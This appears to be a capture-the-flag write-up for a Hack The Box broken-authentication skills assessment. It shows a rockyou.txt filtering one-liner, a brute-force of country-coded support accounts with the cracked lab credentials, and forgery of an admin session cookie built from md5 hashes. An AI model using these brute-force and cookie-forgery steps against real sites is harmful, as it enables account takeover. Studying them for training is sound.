Broken Authentication

Skills Assessment - Hardest module for CBBH path

Register an account

credentials

123francis123:P@ssw0rd1P@ssw0rd123

if you try common passwords it will be blocked with password policy.

Password policy:

The password must start with a capital letter

The password must end with a digit

The password must contain at least one special char: $ # @

The password is shorter than 20 characters

From support page, we know there is a global account called support

It also mentioned other accounts remain unchanged and we can continue to contact any department by adding country code

lets try to IDOR on support account with a wordlist of country codes.

There is /messages.php which can be used to bruteforce different usernames via intruder since there is rate limiting on logins

Country code wordlist

/home/francis/HTB/SecLists/Fuzzing/country-codes.txt

it will take some time to fuzz for the different types of support accounts based on country code.

Lets filter rockyou.txt to remove characters based on password policy

grep '[[:upper:]]' rockyou.txt | grep '[[:punct:]]' | grep '[[:lower:]]' | grep -E '^.{20,20}$' | grep '[[:digit:]]$'

the custom rockyou.txt password list can be used to bruteforce the different support accounts.

After manual bruteforcing via login page,see below for the valid credentials.

support.cn:BisocaBuzau#20061985

support.it:Mustang#firebird1995

support.gr:Situngkir766H!011104

support.uk:TrillPrincessMentality#1

support.us:Mustang#firebird1995

From support.gr, get the session cookie and run ./dcode<session cookie> using Decodify

./dcode NjhjOTI2MDA5MDYyMGU1ZjQ3MWVhYWVlY2IwYmNlNTk6NDM0OTkwYzhhMjVkMmJlOTQ4NjM1NjFhZTk4YmQ2ODI%3D

Decoded from Base64 : 68c9260090620e5f471eaaeecb0bce59:434990c8a25d2be94863561ae98bd682

it seems like the output above is in this format <md5 hash>:<md5 hash>

lets try to manually decode the md5 hash one by one

the hash format is support.gr:support and is under username:role

now lets try to change the username:role to admin privileges

admin.gr:admin and encode it to md5

echo -n 'admin.gr' | md5sum

041da04f12f5c3768bd0f9cb1efd5572

echo -n 'admin' | md5sum

21232f297a57a5a743894a0e4a801fc3

So the new format is 041da04f12f5c3768bd0f9cb1efd5572:21232f297a57a5a743894a0e4a801fc3

now lets use CyberChef to encode it to base64 and URL encode

MDQxZGEwNGYxMmY1YzM3NjhiZDBmOWNiMWVmZDU1NzI6MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D

Enter the cookie via developer tools to get flag

PreviousNotesNextQuestions

Last updated